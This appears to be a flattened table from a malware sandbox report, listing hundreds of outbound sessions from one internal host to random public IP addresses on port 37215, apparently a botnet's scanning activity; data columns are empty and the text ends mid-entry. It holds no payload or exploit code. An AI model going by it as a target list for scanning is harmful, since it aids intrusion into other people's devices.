                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9441192.168.2.154618245.70.195.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9442192.168.2.1547038157.76.195.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9443192.168.2.154212641.196.210.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9444192.168.2.1550634190.9.222.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9445192.168.2.154000237.240.149.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9446192.168.2.155485237.94.119.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9447192.168.2.1559584122.34.112.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9448192.168.2.1553516181.34.190.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9449192.168.2.1544676122.210.210.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9450192.168.2.155316037.227.21.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9451192.168.2.154599245.244.253.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9452192.168.2.154434031.56.226.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9453192.168.2.1537198102.220.112.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9454192.168.2.1559830140.60.70.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9455192.168.2.1542298197.59.244.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9456192.168.2.1543918197.225.156.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9457192.168.2.1549710102.88.49.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9458192.168.2.1546554197.160.83.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9459192.168.2.1555794190.14.187.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9460192.168.2.155910045.187.13.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9461192.168.2.154403694.116.181.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9462192.168.2.1540332121.31.22.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9463192.168.2.155085837.21.195.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9464192.168.2.1547256121.225.202.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9465192.168.2.1554912186.77.221.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9466192.168.2.1537722157.144.91.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9467192.168.2.1542848192.9.152.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9468192.168.2.1555668121.145.105.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9469192.168.2.1546108138.27.87.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9470192.168.2.1548254156.201.189.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9471192.168.2.155714045.178.89.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9472192.168.2.1559264157.154.230.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9473192.168.2.1560274156.61.173.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9474192.168.2.155167031.116.102.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9475192.168.2.153365241.64.67.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9476192.168.2.1560356156.107.248.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9477192.168.2.155084431.32.179.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9478192.168.2.1540572102.193.190.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9479192.168.2.1559544181.116.78.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9480192.168.2.1551168156.24.75.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9481192.168.2.156072641.110.203.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9482192.168.2.155031641.36.206.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9483192.168.2.1542102106.35.136.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9484192.168.2.155005845.140.206.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9485192.168.2.1556192102.243.56.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9486192.168.2.155809631.6.146.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9487192.168.2.154690094.85.66.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9488192.168.2.155621631.164.120.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9489192.168.2.1551694121.192.66.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9490192.168.2.154447837.35.37.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9491192.168.2.1553772122.31.180.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9492192.168.2.155472045.64.78.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9493192.168.2.155434231.208.197.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9494192.168.2.1547556190.37.143.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9495192.168.2.1549348121.126.139.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9496192.168.2.1542488157.90.126.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9497192.168.2.155692641.63.84.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9498192.168.2.1548514102.176.65.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9499192.168.2.1539136102.137.66.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9500192.168.2.1558438138.30.247.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9501192.168.2.1544364138.34.141.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9502192.168.2.1560116157.40.133.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9503192.168.2.153989694.221.247.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9504192.168.2.155978037.30.250.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9505192.168.2.1554400157.54.238.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9506192.168.2.1546388138.143.0.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9507192.168.2.154463631.248.174.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9508192.168.2.1559840197.196.47.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9509192.168.2.1533780138.226.198.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9510192.168.2.1556220197.113.95.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9511192.168.2.1533734122.7.240.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9512192.168.2.1553590190.93.2.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9513192.168.2.1537500119.170.68.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9514192.168.2.1553820156.195.12.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9515192.168.2.154231494.221.145.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9516192.168.2.154780041.86.221.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9517192.168.2.1552090157.211.143.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9518192.168.2.156070845.64.183.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9519192.168.2.153924645.145.164.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9520192.168.2.1554986197.231.247.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9521192.168.2.154373645.153.14.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9522192.168.2.155683045.81.145.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9523192.168.2.153740641.103.222.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9524192.168.2.156015841.44.0.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9525192.168.2.154599045.19.80.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9526192.168.2.154374837.68.63.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9527192.168.2.154316631.165.82.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9528192.168.2.1536850222.209.114.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9529192.168.2.153415231.14.39.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9530192.168.2.153459245.51.220.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9531192.168.2.153345241.55.116.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9532192.168.2.1553664222.219.157.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9533192.168.2.1556906122.99.218.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9534192.168.2.1532980197.148.81.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9535192.168.2.1558416122.8.64.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9536192.168.2.154053445.136.132.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9537192.168.2.1545354222.82.221.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9538192.168.2.1554300102.151.202.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9539192.168.2.155443294.63.160.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9540192.168.2.1546650156.105.192.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9541192.168.2.1559620222.174.217.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9542192.168.2.1550076102.51.248.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9543192.168.2.1542644197.228.183.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9544192.168.2.1557256122.223.20.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9545192.168.2.155594241.250.199.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9546192.168.2.1560076102.31.244.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9547192.168.2.155741245.247.241.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9548192.168.2.1537274181.5.90.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9549192.168.2.1559712122.190.163.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9550192.168.2.1559946197.126.199.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9551192.168.2.1546796122.36.229.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9552192.168.2.154420641.145.143.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9553192.168.2.153765231.30.248.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9554192.168.2.1534116157.204.101.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9555192.168.2.1543116121.56.36.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9556192.168.2.1537380102.246.156.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9557192.168.2.154238831.177.42.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9558192.168.2.1536652156.116.70.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9559192.168.2.1553772181.71.95.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9560192.168.2.153930037.17.31.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9561192.168.2.1543116186.140.218.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9562192.168.2.153501041.237.157.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9563192.168.2.1550910186.131.249.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9564192.168.2.1547050157.50.106.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9565192.168.2.153357641.45.232.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9566192.168.2.1539584197.103.135.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9567192.168.2.1543306122.75.28.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9568192.168.2.1560852156.129.146.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9569192.168.2.156089641.94.182.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9570192.168.2.1558600222.130.7.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9571192.168.2.153776494.135.220.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9572192.168.2.1533992190.115.36.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9573192.168.2.1538416222.138.94.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9574192.168.2.1552878190.39.45.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9575192.168.2.1537030186.219.224.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9576192.168.2.1560174121.93.170.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9577192.168.2.153967645.141.200.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9578192.168.2.1558836222.44.243.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9579192.168.2.1547322222.80.132.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9580192.168.2.1560274102.169.112.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9581192.168.2.155163494.120.151.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9582192.168.2.153290494.36.128.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9583192.168.2.1559636222.110.121.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9584192.168.2.153951894.178.120.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9585192.168.2.1543970121.212.235.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9586192.168.2.1553466181.156.40.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9587192.168.2.1538276195.36.74.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9588192.168.2.1547692102.188.70.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9589192.168.2.1553610186.13.201.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9590192.168.2.1548590122.211.163.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9591192.168.2.155898837.12.180.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9592192.168.2.155124445.143.191.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9593192.168.2.1550876138.225.61.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9594192.168.2.1537760186.246.73.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9595192.168.2.1540856102.175.177.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9596192.168.2.1549016190.53.6.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9597192.168.2.1550332138.189.1.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9598192.168.2.154593041.101.110.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9599192.168.2.1548272102.174.12.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9600192.168.2.1553526102.14.39.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9601192.168.2.156003494.79.201.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9602192.168.2.1537642181.47.31.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9603192.168.2.155658045.102.76.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9604192.168.2.1533694121.53.12.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9605192.168.2.1542606102.38.252.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9606192.168.2.155689031.118.195.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9607192.168.2.1536576122.168.251.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9608192.168.2.154251831.12.233.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9609192.168.2.1536058157.171.195.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9610192.168.2.1554864186.65.232.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9611192.168.2.1551564197.68.7.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9612192.168.2.153706645.51.137.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9613192.168.2.1539500121.250.24.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9614192.168.2.1559154197.2.211.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9615192.168.2.1538602102.73.168.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9616192.168.2.1558264121.37.100.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9617192.168.2.1556534156.164.217.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9618192.168.2.1539156181.1.222.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9619192.168.2.1541400157.190.68.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9620192.168.2.1547148186.60.179.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9621192.168.2.1549026121.186.111.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9622192.168.2.1555080197.39.142.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9623192.168.2.154549231.149.44.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9624192.168.2.1538864181.228.60.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9625192.168.2.1545400222.222.76.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9626192.168.2.155307041.210.154.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9627192.168.2.155757071.190.224.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9628192.168.2.155123041.53.249.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9629192.168.2.155001641.192.23.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9630192.168.2.1547646157.104.208.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9631192.168.2.154108845.202.217.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9632192.168.2.1544804186.227.97.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9633192.168.2.1546660156.41.78.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9634192.168.2.1542618156.208.172.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9635192.168.2.1542234157.241.144.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9636192.168.2.1534374138.206.106.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9637192.168.2.1553588156.18.75.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9638192.168.2.1534566181.1.166.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9639192.168.2.153322045.142.130.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9640192.168.2.1558408122.193.51.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9641192.168.2.1543900222.184.44.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9642192.168.2.154233479.124.95.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9643192.168.2.155653245.127.232.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9644192.168.2.154516237.162.148.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9645192.168.2.1556622157.185.146.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9646192.168.2.1552204121.23.81.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9647192.168.2.1542682122.117.215.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9648192.168.2.153538694.136.188.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9649192.168.2.1534576222.139.149.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9650192.168.2.1554676102.201.183.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9651192.168.2.154794441.82.55.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9652192.168.2.1539242156.54.10.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9653192.168.2.1539152138.10.121.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9654192.168.2.1537074102.139.188.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9655192.168.2.1538506153.223.28.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9656192.168.2.153867894.77.84.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9657192.168.2.153505473.113.59.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9658192.168.2.1533604190.215.5.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
